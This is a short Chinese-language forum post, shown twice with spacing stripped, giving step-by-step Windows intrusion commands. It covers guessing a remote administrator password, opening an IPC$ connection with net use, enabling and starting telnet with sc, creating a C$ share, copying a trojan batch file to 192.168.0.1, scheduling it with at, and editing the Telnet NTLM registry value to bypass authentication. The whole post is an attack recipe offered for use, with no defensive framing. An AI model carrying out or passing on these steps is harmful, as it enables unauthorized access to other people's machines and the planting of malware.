0、偵測遠端機器口令⑴、netuse命令建立IPC連線netuse\IPpassword/user:administrator用sc命令把禁用的telnet服務變成自動sc\IPconfigtlntsvrstart=auto2、用sc命令將telnet啟動sc\IPstarttlntsvr3、netshare建立c$同享netsharesharename=drive:path4、copy命令上傳木馬copya.bat\192.168.0.1c$5、at命令定時履行at\192.168.0.1timecmd注意:如果對方採取了NTLM認證策略,可以連線網路登錄檔修改HKEYLOCALMACHINESOFTWAREMICROSOFTTELNETSERVER1.0下的NTLM鍵值由2改成0。然後重新啟動telnet服務。6、用sc命令將telnet關閉sc\IPstoptlntsvr-⑺、用sc命令將telnet啟動sc\IPstarttlntsvr 檢視原帖>>
0、偵測遠端機器口令⑴、netuse命令建立IPC連線netuse\IPpassword/user:administrator用sc命令把禁用的telnet服務變成自動sc\IPconfigtlntsvrstart=auto2、用sc命令將telnet啟動sc\IPstarttlntsvr3、netshare建立c$同享netsharesharename=drive:path4、copy命令上傳木馬copya.bat\192.168.0.1c$5、at命令定時履行at\192.168.0.1timecmd注意:如果對方採取了NTLM認證策略,可以連線網路登錄檔修改HKEYLOCALMACHINESOFTWAREMICROSOFTTELNETSERVER1.0下的NTLM鍵值由2改成0。然後重新啟動telnet服務。6、用sc命令將telnet關閉sc\IPstoptlntsvr-⑺、用sc命令將telnet啟動sc\IPstarttlntsvr 檢視原帖>>